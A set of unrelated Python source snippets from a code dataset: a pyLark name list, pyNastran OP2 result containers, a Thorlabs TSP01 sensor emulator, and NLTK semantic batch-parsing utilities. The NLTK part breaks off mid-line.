GetBatchSentMessageReadUserResp, GetMessageFileReq, GetMessageFileResp, GetMessageFileResp, GetMessageReadUserListReq, GetMessageReadUserListRespItem, GetMessageReadUserListResp, GetMessageListReq, GetMessageListRespItem, GetMessageListResp, ReplyRawMessageReq, ReplyRawMessageResp, SendRawMessageReq, SendRawMessageResp, SendEphemeralMessageReq, SendEphemeralMessageResp, SendRawMessageOldReqContent, SendRawMessageOldReq, SendRawMessageOldResp, SendUrgentAppMessageReq, SendUrgentAppMessageResp, SendUrgentPhoneMessageReq, SendUrgentPhoneMessageResp, SendUrgentSmsMessageReq, SendUrgentSmsMessageResp, UpdateMessageReq, UpdateMessageResp, LarkOKRService, BatchGetOKRReq, BatchGetOKRRespOKRObjectiveAligningObjectiveOwner, BatchGetOKRRespOKRObjectiveAligningObjective, BatchGetOKRRespOKRObjectiveAlignedObjectiveOwner, BatchGetOKRRespOKRObjectiveAlignedObjective, BatchGetOKRRespOKRObjectiveKrProgressRate, BatchGetOKRRespOKRObjectiveKr, BatchGetOKRRespOKRObjectiveProgressRate, BatchGetOKRRespOKRObjective, BatchGetOKRRespOKR, BatchGetOKRResp, GetOKRPeriodListReq, GetOKRPeriodListRespItem, GetOKRPeriodListResp, GetUserOKRListReq, GetUserOKRListRespOKRObjectiveAligningObjectiveOwner, GetUserOKRListRespOKRObjectiveAligningObjective, GetUserOKRListRespOKRObjectiveAlignedObjectiveOwner, GetUserOKRListRespOKRObjectiveAlignedObjective, GetUserOKRListRespOKRObjectiveKrProgressRate, GetUserOKRListRespOKRObjectiveKr, GetUserOKRListRespOKRObjectiveProgressRate, GetUserOKRListRespOKRObjective, GetUserOKRListRespOKR, GetUserOKRListResp, LarkSearchService, CreateSearchDataSourceReq, CreateSearchDataSourceRespDataSource, CreateSearchDataSourceResp, DeleteSearchDataSourceReq, DeleteSearchDataSourceResp, GetSearchDataSourceReq, GetSearchDataSourceRespDataSource, GetSearchDataSourceResp, CreateSearchDataSourceItemReqContent, CreateSearchDataSourceItemReqMetadata, CreateSearchDataSourceItemReqACL, CreateSearchDataSourceItemReq, CreateSearchDataSourceItemResp, DeleteSearchDataSourceItemReq, DeleteSearchDataSourceItemResp, GetSearchDataSourceItemReq, GetSearchDataSourceItemRespItemContent, GetSearchDataSourceItemRespItemMetadata, GetSearchDataSourceItemRespItemACL, GetSearchDataSourceItemRespItem, GetSearchDataSourceItemResp, GetSearchDataSourceListReq, GetSearchDataSourceListRespItem, GetSearchDataSourceListResp, UpdateSearchDataSourceReq, UpdateSearchDataSourceRespDataSource, UpdateSearchDataSourceResp, LarkTaskService, CreateTaskCollaboratorReq, CreateTaskCollaboratorRespCollaborator, CreateTaskCollaboratorResp, DeleteTaskCollaboratorReq, DeleteTaskCollaboratorResp, GetTaskCollaboratorListReq, GetTaskCollaboratorListRespItem, GetTaskCollaboratorListResp, CreateTaskCommentReq, CreateTaskCommentRespComment, CreateTaskCommentResp, DeleteTaskCommentReq, DeleteTaskCommentResp, GetTaskCommentReq, GetTaskCommentRespComment, GetTaskCommentResp, UpdateTaskCommentReq, UpdateTaskCommentRespComment, UpdateTaskCommentResp, CreateTaskFollowerReq, CreateTaskFollowerRespFollower, CreateTaskFollowerResp, DeleteTaskFollowerReq, DeleteTaskFollowerResp, GetTaskFollowerListReq, GetTaskFollowerListRespItem, GetTaskFollowerListResp, CreateTaskReminderReq, CreateTaskReminderRespReminder, CreateTaskReminderResp, DeleteTaskReminderReq, DeleteTaskReminderResp, GetTaskReminderListReq, GetTaskReminderListRespItem, GetTaskReminderListResp, GetTaskReq, GetTaskRespTaskOriginHref, GetTaskRespTaskOrigin, GetTaskRespTaskDue, GetTaskRespTask, GetTaskResp, CompleteTaskReq, CompleteTaskResp, CreateTaskReqOriginHref, CreateTaskReqOrigin, CreateTaskReqDue, CreateTaskReq, CreateTaskRespTaskOriginHref, CreateTaskRespTaskOrigin, CreateTaskRespTaskDue, CreateTaskRespTask, CreateTaskResp, DeleteTaskReq, DeleteTaskResp, UncompleteTaskReq, UncompleteTaskResp, UpdateTaskReqTaskOriginHref, UpdateTaskReqTaskOrigin, UpdateTaskReqTaskDue, UpdateTaskReqTask, UpdateTaskReq, UpdateTaskRespTaskOriginHref, UpdateTaskRespTaskOrigin, UpdateTaskRespTaskDue, UpdateTaskRespTask, UpdateTaskResp, LarkTenantService, GetTenantReq, GetTenantRespTenantAvatar, GetTenantRespTenant, GetTenantResp, LarkVCService, EndVCMeetingReq, EndVCMeetingResp, GetVCMeetingReq, GetVCMeetingRespMeetingAbility, GetVCMeetingRespMeetingParticipant, GetVCMeetingRespMeetingHostUser, GetVCMeetingRespMeeting, GetVCMeetingResp, InviteVCMeetingReqInvitee, InviteVCMeetingReq, InviteVCMeetingRespInviteResult, InviteVCMeetingResp, KickoutVCMeetingReqKickoutUser, KickoutVCMeetingReq, KickoutVCMeetingRespKickoutResult, KickoutVCMeetingResp, GetVCMeetingRecordingReq, GetVCMeetingRecordingRespRecording, GetVCMeetingRecordingResp, SetVCPermissionMeetingRecordingReqPermissionObject, SetVCPermissionMeetingRecordingReq, SetVCPermissionMeetingRecordingResp, StartVCMeetingRecordingReq, StartVCMeetingRecordingResp, StopVCMeetingRecordingReq, StopVCMeetingRecordingResp, SetVCHostMeetingReqOldHostUser, SetVCHostMeetingReqHostUser, SetVCHostMeetingReq, SetVCHostMeetingRespHostUser, SetVCHostMeetingResp, GetVCDailyReportReq, GetVCDailyReportRespMeetingReportDailyReport, GetVCDailyReportRespMeetingReport, GetVCDailyReportResp, GetVCTopUserReportReq, GetVCTopUserReportRespTopUserReport, GetVCTopUserReportResp, ApplyVCReserveReqMeetingSettingsCallSettingCalleePstnSipInfo, ApplyVCReserveReqMeetingSettingsCallSettingCallee, ApplyVCReserveReqMeetingSettingsCallSetting, ApplyVCReserveReqMeetingSettingsActionPermissionPermissionChecker, ApplyVCReserveReqMeetingSettingsActionPermission, ApplyVCReserveReqMeetingSettings, ApplyVCReserveReq, ApplyVCReserveRespReserve, ApplyVCReserveResp, DeleteVCReserveReq, DeleteVCReserveResp, GetVCReserveReq, GetVCReserveRespReserveMeetingSettingsCallSettingCalleePstnSipInfo, GetVCReserveRespReserveMeetingSettingsCallSettingCallee, GetVCReserveRespReserveMeetingSettingsCallSetting, GetVCReserveRespReserveMeetingSettingsActionPermissionPermissionChecker, GetVCReserveRespReserveMeetingSettingsActionPermission, GetVCReserveRespReserveMeetingSettings, GetVCReserveRespReserve, GetVCReserveResp, GetVCReserveActiveMeetingReq, GetVCReserveActiveMeetingRespMeetingAbility, GetVCReserveActiveMeetingRespMeetingParticipant, GetVCReserveActiveMeetingRespMeetingHostUser, GetVCReserveActiveMeetingRespMeeting, GetVCReserveActiveMeetingResp, UpdateVCReserveReqMeetingSettingsCallSettingCalleePstnSipInfo, UpdateVCReserveReqMeetingSettingsCallSettingCallee, UpdateVCReserveReqMeetingSettingsCallSetting, UpdateVCReserveReqMeetingSettingsActionPermissionPermissionChecker, UpdateVCReserveReqMeetingSettingsActionPermission, UpdateVCReserveReqMeetingSettings, UpdateVCReserveReq, UpdateVCReserveRespReserve, UpdateVCReserveResp, GetVCRoomConfigReq, GetVCRoomConfigRespDigitalSignageMaterial, GetVCRoomConfigRespDigitalSignage, GetVCRoomConfigResp, SetVCRoomConfigReqRoomConfigDigitalSignageMaterial, SetVCRoomConfigReqRoomConfigDigitalSignage, SetVCRoomConfigReqRoomConfig, SetVCRoomConfigReq, SetVCRoomConfigResp, Lark, PyLarkError, Response, MethodOption, RawRequestReq, Request, MsgType, ContainerIDType, IDType, DepartmentIDType, MailUserType, EmployeeType, ChatType, ImageType, FileType, CalendarRole, CalendarEventAttendeeType, CalendarType, CalendarPermission, AddMemberPermission, MessageVisibility, MembershipApproval, ModerationPermission, ShareCardPermission, AtAllPermission, EditPermission, HelpdeskDropdownOption, ApprovalWidgetType, ApprovalWidget, ApprovalWidgetOption, ApprovalWidgetList, MessageContentPostItem, MessageContentPost, MessageContentPostAll, SheetContent, SheetRuleAttr, logger, ]
StarcoderdataPython
3211683
<gh_stars>1-10 """Constants are defined here""" TO_DO = 'TO_DO' IN_PROGRESS = 'IN_PROGRESS' DONE = 'DONE'
StarcoderdataPython
83168
from typing import Dict, Any from pyNastran.op2.op2_interface.random_results import ( RADCONS, RAECONS, RASCONS, RAPCONS, RAFCONS, RAGCONS, RANCONS, RADEATC, RAEEATC, RASEATC, RAPEATC, RAFEATC, RAGEATC, RANEATC, ROUGV1, RADEFFM, SRSS, ABS, NRL, AutoCorrelationObjects, PowerSpectralDensityObjects, RootMeansSquareObjects, CumulativeRootMeansSquareObjects, NumberOfCrossingsObjects, PSDObjects, ) from pyNastran.op2.result_objects.design_response import Responses class Results: """storage object for even more op2_results (see op2.op2_results)""" def __init__(self): self.eqexin = None self.gpdt = None self.bgpdt = None self.cddata = [] self.monitor1 = None self.monitor3 = None self.responses = Responses() self.separation_initial = {} self.separation_final = {} self.psds = PSDObjects() self.ato = AutoCorrelationObjects() self.psd = PowerSpectralDensityObjects() self.rms = RootMeansSquareObjects() self.no = NumberOfCrossingsObjects() self.crm = CumulativeRootMeansSquareObjects() self.acoustic = Acoustic() self.modal_contribution = ModalContribution() self.solution_set = SolutionSet() self.strength_ratio = StrengthRatio() self.failure_indices = FailureIndices() self.force = Force() self.thermal_load = ThermalLoad() self.stress = Stress() self.strain = Strain() self.strain_energy = StrainEnergy() self.ROUGV1 = ROUGV1() # relative disp/vel/acc/eigenvectors self.RADEFFM = RADEFFM() # eigenvectors self.RADCONS = RADCONS() # eigenvectors self.RAFCONS = RAFCONS() # force self.RASCONS = RASCONS() # stress self.RAECONS = RAECONS() # strain self.RAGCONS = RAGCONS() # grid point forces self.RAPCONS = RAPCONS() # composite stress self.RANCONS = RANCONS() # strain energy self.RADEATC = RADEATC() # eigenvectors self.RAFEATC = RAFEATC() # force self.RASEATC = RASEATC() # stress self.RAEEATC = RAEEATC() # strain self.RAGEATC = RAGEATC() # grid point forces self.RAPEATC = RAPEATC() # composite stress self.RANEATC = RANEATC() # strain energy self.srss = SRSS() self.abs = ABS() self.nrl = NRL() self.cstm = CSTM() self.trmbd = TRMBD() self.trmbu = TRMBU() def _get_sum_objects_map(self): sum_objs = { 'acoustic' : self.acoustic, 'responses' : self.responses, 'force' : self.force, 'thermal_load' : self.thermal_load, 'strain_energy' : self.strain_energy, 'stress': self.stress, 'strain': self.strain, #self.ato, #self.psd, #self.rms, #self.no, #self.crm, #self.modal_contribution, #self.strength_ratio, #self.failure_indices, #self.solution_set, #self.ROUGV1, #self.RADEFFM, #self.RADCONS, self.RAFCONS, self.RASCONS, self.RAECONS, self.RAGCONS, self.RAPCONS, self.RANCONS, #self.RADEATC, self.RAFEATC, self.RASEATC, self.RAEEATC, self.RAGEATC, self.RAPEATC, self.RANEATC, } return sum_objs def _get_sum_objects(self): sum_objs = [ self.acoustic, self.responses, self.force, self.thermal_load, self.stress, self.strain, self.strain_energy, self.ato, self.psd, self.rms, self.no, self.crm, self.modal_contribution, self.strength_ratio, self.failure_indices, self.solution_set, self.ROUGV1, self.RADEFFM, self.RADCONS, self.RAFCONS, self.RASCONS, self.RAECONS, self.RAGCONS, self.RAPCONS, self.RANCONS, self.RADEATC, self.RAFEATC, self.RASEATC, self.RAEEATC, self.RAGEATC, self.RAPEATC, self.RANEATC, self.srss, self.abs, self.nrl, ] return sum_objs def _get_base_objects_map(self) -> Dict[str, Any]: """gets only the objects that are do not contain sub-objects""" base_names = [ 'eqexin', 'gpdt', 'bgpdt', 'psds', 'monitor1', 'monitor3', 'separation_initial', 'separation_final', ] base_objs_map = {} for base_name in base_names: obj = getattr(self, base_name) if obj: base_objs_map[base_name] = obj return base_objs_map def get_table_types(self): """combines all the table_types from all objects and sub-objects""" base = [ 'eqexin', 'gpdt', 'bgpdt', 'psds', 'monitor1', 'monitor3', 'separation_initial', 'separation_final', ] sum_objs = self._get_sum_objects() for objs in sum_objs: base.extend(objs.get_table_types()) return base def __repr__(self): msg = 'Results:\n' # all these objects have data base_obj_map = self._get_base_objects_map() sum_obj_map = self._get_sum_objects_map() for key, obj in base_obj_map.items(): msg += f' {key}\n' for key, obj in sum_obj_map.items(): sub_results = obj.get_table_types() msgi = '' for sub_result in sub_results: unused_base, sub_result2 = sub_result.split('.') res = getattr(obj, sub_result2) if res is None or res == {}: continue msgi += f' {sub_result2}\n' #msg += f' {key}\n' if msgi: msg += f' {key}:\n' msg += msgi return msg class SolutionSet: def __init__(self): self.displacements = {} self.velocities = {} self.accelerations = {} self.eigenvectors = {} def get_table_types(self): tables = [ 'displacements', 'velocities', 'accelerations', 'eigenvectors', ] return ['solution_set.' + table for table in tables] class Acoustic: def __init__(self): self.displacements = {} def get_table_types(self): tables = [ 'displacements', ] return ['acoustic.' + table for table in tables] class ModalContribution: def __init__(self): self.displacements = {} self.celas1_stress = {} self.celas2_stress = {} self.celas3_stress = {} self.celas4_stress = {} self.celas1_strain = {} self.celas2_strain = {} self.celas3_strain = {} self.celas4_strain = {} self.crod_stress = {} self.conrod_stress = {} self.ctube_stress = {} self.crod_strain = {} self.conrod_strain = {} self.ctube_strain = {} self.cbend_stress = {} self.ctetra_stress = {} self.cpenta_stress = {} self.chexa_stress = {} self.ctetra_strain = {} self.cpenta_strain = {} self.chexa_strain = {} self.cbar_stress = {} self.cbar_strain = {} self.cbeam_stress = {} self.cbeam_strain = {} self.ctria3_stress = {} self.ctria6_stress = {} self.cquad4_stress = {} self.cquad8_stress = {} self.cquadr_stress = {} self.ctriar_stress = {} self.ctria3_strain = {} self.ctria6_strain = {} self.cquad4_strain = {} self.cquad8_strain = {} self.cquadr_strain = {} self.ctriar_strain = {} self.cquad4_composite_stress = {} self.cquad8_composite_stress = {} self.cquadr_composite_stress = {} self.ctria3_composite_stress = {} self.ctria6_composite_stress = {} self.ctriar_composite_stress = {} self.cquad4_composite_strain = {} self.cquad8_composite_strain = {} self.cquadr_composite_strain = {} self.ctria3_composite_strain = {} self.ctria6_composite_strain = {} self.ctriar_composite_strain = {} self.cshear_stress = {} self.cshear_strain = {} self.cshear_force = {} self.cbush_stress = {} self.cbush_strain = {} def get_table_types(self): tables = [ 'displacements', # 'velocities', 'accelerations', #'load_vectors', 'spc_forces', 'mpc_forces', #'celas1_force', 'celas2_force', 'celas3_force', 'celas4_force', #'crod_force', 'conrod_force', 'ctube_force', #'cbar_force', 'cbeam_force', #'cquad4_force', 'cquad8_force', 'cquadr_force', #'ctria3_force', 'ctria6_force', 'ctriar_force', 'celas1_stress', 'celas2_stress', 'celas3_stress', 'celas4_stress', 'crod_stress', 'conrod_stress', 'ctube_stress', 'cbar_stress', 'cbeam_stress', 'ctria3_stress', 'ctriar_stress', 'ctria6_stress', 'cquadr_stress', 'cquad4_stress', 'cquad8_stress', 'ctetra_stress', 'cpenta_stress', 'chexa_stress', 'celas1_strain', 'celas2_strain', 'celas3_strain', 'celas4_strain', 'crod_strain', 'conrod_strain', 'ctube_strain', 'cbar_strain', 'cbeam_strain', 'ctria3_strain', 'ctriar_strain', 'ctria6_strain', 'cquadr_strain', 'cquad4_strain', 'cquad8_strain', 'ctetra_strain', 'cpenta_strain', 'chexa_strain', 'cbend_stress', # 'cbend_strain', 'cbend_force', 'cbush_stress', 'cbush_strain', 'cshear_stress', 'cshear_strain', 'cshear_force', 'cquad4_composite_stress', 'cquad8_composite_stress', 'cquadr_composite_stress', 'ctria3_composite_stress', 'ctria6_composite_stress', 'ctriar_composite_stress', 'cquad4_composite_strain', 'cquad8_composite_strain', 'cquadr_composite_strain', 'ctria3_composite_strain', 'ctria6_composite_strain', 'ctriar_composite_strain', #'cbush_force', #'cdamp1_force', 'cdamp2_force', 'cdamp3_force', 'cdamp4_force', #'cvisc_force', ] return ['modal_contribution.' + table for table in tables] class StrengthRatio: def __init__(self): self.cquad4_composite_stress = {} self.cquad8_composite_stress = {} self.cquadr_composite_stress = {} self.ctria3_composite_stress = {} self.ctria6_composite_stress = {} self.ctriar_composite_stress = {} self.cquad4_composite_strain = {} self.cquad8_composite_strain = {} self.cquadr_composite_strain = {} self.ctria3_composite_strain = {} self.ctria6_composite_strain = {} self.ctriar_composite_strain = {} def get_table_types(self): tables = [ 'cquad4_composite_stress', 'cquad8_composite_stress', 'cquadr_composite_stress', 'ctria3_composite_stress', 'ctria6_composite_stress', 'ctriar_composite_stress', 'cquad4_composite_strain', 'cquad8_composite_strain', 'cquadr_composite_strain', 'ctria3_composite_strain', 'ctria6_composite_strain', 'ctriar_composite_strain', ] return ['strength_ratio.' + table for table in tables] class FailureIndices: def __init__(self): self.cquad4_composite_force = {} self.cquad8_composite_force = {} self.cquadr_composite_force = {} self.ctria3_composite_force = {} self.ctria6_composite_force = {} self.ctriar_composite_force = {} def get_table_types(self): tables = [ 'cquad4_composite_force', 'cquad8_composite_force', 'cquadr_composite_force', 'ctria3_composite_force', 'ctria6_composite_force', 'ctriar_composite_force', ] return ['failure_indices.' + table for table in tables] class Force: def __init__(self): self.celas1_force = {} self.celas2_force = {} self.celas3_force = {} self.celas4_force = {} self.cdamp1_force = {} self.cdamp2_force = {} self.cdamp3_force = {} self.cdamp4_force = {} self.crod_force = {} self.conrod_force = {} self.ctube_force = {} self.cbeam_force = {} self.cbar_force = {} self.ctria3_force = {} self.ctria6_force = {} self.ctriar_force = {} self.cquad4_force = {} self.cquad8_force = {} self.cquadr_force = {} self.cvisc_force = {} self.cgap_force = {} self.cbear_force = {} self.cbush_force = {} self.cfast_force = {} self.cweld_force = {} self.cvisc_force = {} self.cbend_force = {} self.cshear_force = {} self.cconeax_force = {} # solidPressureForces self.chexa_pressure_force = {} self.cpenta_pressure_force = {} self.ctetra_pressure_force = {} self.cpyram_pressure_force = {} def get_table_types(self): tables = [ # 0d 'celas1_force', 'celas2_force', 'celas3_force', 'celas4_force', 'cdamp1_force', 'cdamp2_force', 'cdamp3_force', 'cdamp4_force', 'cvisc_force', 'cgap_force', 'cbush_force', 'cconeax_force', # 1d 'crod_force', 'conrod_force', 'ctube_force', 'cbar_force', 'cbeam_force', 'cbend_force', 'cfast_force', 'cweld_force', 'cbear_force', # 2d 'ctria3_force', 'ctria6_force', 'ctriar_force', 'cquad4_force', 'cquad8_force', 'cquadr_force', 'cshear_force', # solid pressure forces 'chexa_pressure_force', 'cpenta_pressure_force', 'ctetra_pressure_force', 'cpyram_pressure_force', ] return ['force.' + table for table in tables] class ThermalLoad: def __init__(self): #OEF - Fluxes - tCode=4 thermal=1 self.conv_thermal_load = {} #self.thermalLoad_CHBDY = {} self.chbdye_thermal_load = {} self.chbdyg_thermal_load = {} self.chbdyp_thermal_load = {} self.chbdye_thermal_load_flux = {} self.chbdyg_thermal_load_flux = {} self.chbdyp_thermal_load_flux = {} #self.thermalLoad_1D self.crod_thermal_load = {} self.cbeam_thermal_load = {} self.ctube_thermal_load = {} self.conrod_thermal_load = {} self.cbar_thermal_load = {} self.cbend_thermal_load = {} self.crod_thermal_load_flux = {} self.cbeam_thermal_load_flux = {} self.ctube_thermal_load_flux = {} self.conrod_thermal_load_flux = {} self.cbar_thermal_load_flux = {} self.cbend_thermal_load_flux = {} #self.thermalLoad_2D_3D self.cquad4_thermal_load = {} self.ctriax6_thermal_load = {} self.cquad8_thermal_load = {} self.ctria3_thermal_load = {} self.ctria6_thermal_load = {} self.ctetra_thermal_load = {} self.chexa_thermal_load = {} self.cpenta_thermal_load = {} self.cquad4_thermal_load_flux = {} self.ctriax6_thermal_load_flux = {} self.cquad8_thermal_load_flux = {} self.ctria3_thermal_load_flux = {} self.ctria6_thermal_load_flux = {} self.ctetra_thermal_load_flux = {} self.chexa_thermal_load_flux = {} self.cpenta_thermal_load_flux = {} #self.temperatureForces = {} def get_table_types(self): tables = [ 'conv_thermal_load', # flux 'chbdye_thermal_load', 'chbdyg_thermal_load', 'chbdyp_thermal_load', 'chbdye_thermal_load_flux', 'chbdyg_thermal_load_flux', 'chbdyp_thermal_load_flux', # 1D 'crod_thermal_load', 'cbeam_thermal_load', 'ctube_thermal_load', 'conrod_thermal_load', 'cbar_thermal_load', 'cbend_thermal_load', 'crod_thermal_load_flux', 'cbeam_thermal_load_flux', 'ctube_thermal_load_flux', 'conrod_thermal_load_flux', 'cbar_thermal_load_flux', 'cbend_thermal_load_flux', #self.thermalLoad_2D_3D 'cquad4_thermal_load', 'ctriax6_thermal_load', 'cquad8_thermal_load', 'ctria3_thermal_load', 'ctria6_thermal_load', 'ctetra_thermal_load', 'chexa_thermal_load', 'cpenta_thermal_load', # 2d/3d 'cquad4_thermal_load_flux', 'ctriax6_thermal_load_flux', 'cquad8_thermal_load_flux', 'ctria3_thermal_load_flux', 'ctria6_thermal_load_flux', 'ctetra_thermal_load_flux', 'chexa_thermal_load_flux', 'cpenta_thermal_load_flux', ] return ['thermal_load.' + table for table in tables] class Stress: def __init__(self): self.celas1_stress = {} self.celas2_stress = {} self.celas3_stress = {} self.celas4_stress = {} self.ctetra_stress = {} self.cpenta_stress = {} self.chexa_stress = {} self.cpyram_stress = {} # 269, 270 self.chexa_composite_stress = {} self.cpenta_composite_stress = {} def get_table_types(self): tables = [ # OES - CELAS1/CELAS2/CELAS3/CELAS4 stress 'celas1_stress', 'celas2_stress', 'celas3_stress', 'celas4_stress', # OES - isotropic CTETRA/CHEXA/CPENTA stress 'ctetra_stress', 'cpenta_stress', 'chexa_stress', 'cpyram_stress', 'chexa_composite_stress', 'cpenta_composite_stress', ] return ['stress.' + table for table in tables] class Strain: def __init__(self): self.ctetra_strain = {} self.cpenta_strain = {} self.chexa_strain = {} self.cpyram_strain = {} # springs self.celas1_strain = {} self.celas2_strain = {} self.celas3_strain = {} self.celas4_strain = {} # 269, 270 self.chexa_composite_strain = {} self.cpenta_composite_strain = {} def get_table_types(self): tables = [ # OES - CELAS1/CELAS2/CELAS3/CELAS4 strain 'celas1_strain', 'celas2_strain', 'celas3_strain', 'celas4_strain', # OES - isotropic CTETRA/CHEXA/CPENTA strain 'ctetra_strain', 'cpenta_strain', 'chexa_strain', 'cpyram_strain', 'chexa_composite_strain', 'cpenta_composite_strain', ] return ['strain.' + table for table in tables] class StrainEnergy: def __init__(self): """ OEE - strain energy density; tCode=18 """ self.celas1_strain_energy = {} self.celas2_strain_energy = {} self.celas3_strain_energy = {} self.celas4_strain_energy = {} self.cdamp1_strain_energy = {} self.cdamp2_strain_energy = {} self.cdamp3_strain_energy = {} self.cdamp4_strain_energy = {} self.cquad4_strain_energy = {} self.cquad8_strain_energy = {} self.cquadr_strain_energy = {} self.cquadx_strain_energy = {} self.ctria3_strain_energy = {} self.ctria6_strain_energy = {} self.ctriar_strain_energy = {} self.ctriax_strain_energy = {} self.ctriax6_strain_energy = {} self.ctetra_strain_energy = {} self.cpenta_strain_energy = {} self.chexa_strain_energy = {} self.cpyram_strain_energy = {} self.crod_strain_energy = {} self.ctube_strain_energy = {} self.conrod_strain_energy = {} self.cbar_strain_energy = {} self.cbeam_strain_energy = {} self.cbend_strain_energy = {} self.cbeam3_strain_energy = {} self.cgap_strain_energy = {} self.cdum8_strain_energy = {} self.cbush_strain_energy = {} #self.chexa8fd_strain_energy = {} self.dmig_strain_energy = {} self.genel_strain_energy = {} self.cshear_strain_energy = {} self.conm2_strain_energy = {} self.rbe1_strain_energy = {} self.rbe3_strain_energy = {} self.cweld_strain_energy = {} self.cfast_strain_energy = {} self.cseam_strain_energy = {} def get_table_types(self): tables = [ # OEE - strain energy density # tCode=18 'cquad4_strain_energy', 'cquad8_strain_energy', 'cquadr_strain_energy', 'cquadx_strain_energy', 'ctria3_strain_energy', 'ctria6_strain_energy', 'ctriar_strain_energy', 'ctriax_strain_energy', 'ctriax6_strain_energy', 'cshear_strain_energy', 'ctetra_strain_energy', 'cpenta_strain_energy', 'chexa_strain_energy', 'cpyram_strain_energy', 'crod_strain_energy', 'ctube_strain_energy', 'conrod_strain_energy', 'cbar_strain_energy', 'cbeam_strain_energy', 'cbeam3_strain_energy', 'cgap_strain_energy', 'cbush_strain_energy', 'celas1_strain_energy', 'celas2_strain_energy', 'celas3_strain_energy', 'celas4_strain_energy', 'cdamp1_strain_energy', 'cdamp2_strain_energy', 'cdamp3_strain_energy', 'cdamp4_strain_energy', 'cdum8_strain_energy', #'chexa8fd_strain_energy' 'cbend_strain_energy', 'dmig_strain_energy', 'genel_strain_energy', 'conm2_strain_energy', 'rbe1_strain_energy', 'rbe3_strain_energy', 'cweld_strain_energy', 'cfast_strain_energy', 'cseam_strain_energy', ] return ['strain_energy.' + table for table in tables] class CSTM: def __init__(self): self.headers = {"cid": 0, "cid_type": 1, "unused_int_index": 2, "unused_double_index": 3, "ox": 4, "oy": 5, "oz": 6, "T11": 7, "T12": 8, "T13": 9, "T21": 10, "T22": 11, "T23": 12, "T31": 13, "T32": 14, "T33": 15 } self.data = None # type: Optional[np.ndarray] # Coordinate Transformation Matrices from Native to Global def __repr__(self) -> str: msg = 'CSTM:\n' msg += f' headers_str = {self.headers.keys()}\n' msg += f' headers_ints = {self.headers.values()}\n' if self.data is not None: msg += f' data.shape = {self.data.shape}' else: msg += ' data = None' return msg class TRMBD: def __init__(self): self.nodes = {} self.eulersx = {} self.eulersy = {} self.eulersz = {} def __repr__(self) -> str: msg = 'TRMBD:\n' msg += f' nodes, eulersx, eulersy, eulersz' return msg class TRMBU: def __init__(self): self.eulers = {} def __repr__(self) -> str: msg = 'TRMBD:\n' msg += f' eulers' return msg
StarcoderdataPython
3365280
<reponame>spacetelescope/instrument-interface-library<filename>catkit/emulators/thorlabs/TSP01.py import ctypes c_void_p = ctypes.POINTER(ctypes.c_void_p) c_int_p = ctypes.POINTER(ctypes.c_int) c_double_p = ctypes.POINTER(ctypes.c_double) class TSP01Emulator(ctypes.Structure): _fields_ = [("serial_number", ctypes.c_char_p), ("temp", ctypes.c_double), ("humidity", ctypes.c_double)] def __init__(self, serial_number, temp, humidity): self.serial_number = serial_number.encode() self.temp = temp self.humidity = humidity def TLTSPB_init(self, device_name, id_query, reset_device, connection): # int TLTSPB_init(char * device_name, bool id_query, bool reset_device, void ** connection) connection_p = ctypes.cast(connection, c_void_p) # deref ctypes.byref() connection_p.contents.value = ctypes.addressof(self) # NOTE: E.g., ``self.temp`` is accessible via: # TSP01Emulator_p = ctypes.POINTER(TSP01Emulator) # new_self = ctypes.cast(connection, TSP01Emulator_p).contents # new_self.temp return 0 @staticmethod def TLTSPB_close(connection): # int TLTSPB_close(void * connection) return 0 def TLTSPB_measTemperature(self, connection, channel, temp): # int TLTSPB_getTemperatureData(void * connection, int channel, double * temp) pointer = ctypes.cast(temp, c_double_p) # deref ctypes.byref() pointer.contents.value = self.temp return 0 def TLTSPB_measHumidity(self, connection, humidity): # int TLTSPB_getHumidityData(void * connection, ?, double * humidity) pointer = ctypes.cast(humidity, c_double_p) # deref ctypes.byref() pointer.contents.value = self.humidity return 0 @staticmethod def TLTSPB_errorMessage(connection, status_code, error_message): # int TLTSPB_errorMessage(void * connection, int status_code, char * error_message) error_message.value = "Error".encode() return 0 @staticmethod def TLTSPB_findRsrc(connection, device_count): # int TLTSPB_findRsrc(void * connection, int * device_count) pointer = ctypes.cast(device_count, c_int_p) # deref ctypes.byref() pointer.contents.value = 1 return 0 def TLTSPB_getRsrcName(self, connection, device_index, buffer): # int TLTSPB_getRsrcName(void * connection, int device_index, char * buffer) buffer.value = self.serial_number return 0
StarcoderdataPython
1684219
# Natural Language Toolkit: Semantic Interpretation # # Author: <NAME> <<EMAIL>> # # Copyright (C) 2001-2013 NLTK Project # URL: <http://nltk.org/> # For license information, see LICENSE.TXT """ Utility functions for batch-processing sentences: parsing and extraction of the semantic representation of the root node of the the syntax tree, followed by evaluation of the semantic representation in a first-order model. """ from __future__ import print_function, unicode_literals import re import codecs from . import evaluate ############################################################## ## Utility functions for connecting parse output to semantics ############################################################## def batch_parse(inputs, grammar, trace=0): """ Convert input sentences into syntactic trees. :param inputs: sentences to be parsed :type inputs: list of str :param grammar: ``FeatureGrammar`` or name of feature-based grammar :rtype: dict :return: a mapping from input sentences to a list of ``Tree``s """ # put imports here to avoid circult dependencies from nltk.grammar import FeatureGrammar from nltk.parse import FeatureChartParser, load_parser if isinstance(grammar, FeatureGrammar): cp = FeatureChartParser(grammar) else: cp = load_parser(grammar, trace=trace) parses = [] for sent in inputs: tokens = sent.split() # use a tokenizer? syntrees = cp.nbest_parse(tokens) parses.append(syntrees) return parses def root_semrep(syntree, semkey='SEM'): """ Find the semantic representation at the root of a tree. :param syntree: a parse ``Tree`` :param semkey: the feature label to use for the root semantics in the tree :return: the semantic representation at the root of a ``Tree`` :rtype: sem.Expression """ from nltk.grammar import FeatStructNonterminal node = syntree.label() assert isinstance(node, FeatStructNonterminal) try: return node[semkey] except KeyError: print(node, end=' ') print("has no specification for the feature %s" % semkey) raise def batch_interpret(inputs, grammar, semkey='SEM', trace=0): """ Add the semantic representation to each syntactic parse tree of each input sentence. :param inputs: a list of sentences :param grammar: ``FeatureGrammar`` or name of feature-based grammar :return: a mapping from sentences to lists of pairs (parse-tree, semantic-representations) :rtype: dict """ return [[(syn, root_semrep(syn, semkey)) for syn in syntrees] for syntrees in batch_parse(inputs, grammar, trace=trace)] def batch_evaluate(inputs, grammar, model, assignment, trace=0): """ Add the truth-in-a-model value to each semantic representation for each syntactic parse of each input sentences. :param inputs: a list of sentences :param grammar: ``FeatureGrammar`` or name of feature-based grammar :return: a mapping from sentences to lists of triples (parse-tree, semantic-representations, evaluation-in-model) :rtype: dict """ return [[(syn, sem, model.evaluate("%s" % sem, assignment, trace=trace)) for (syn, sem) in interpretations] for interpretations in batch_interpret(inputs, grammar)] ########################################## # REs used by the parse_valuation function ########################################## _VAL_SPLIT_RE = 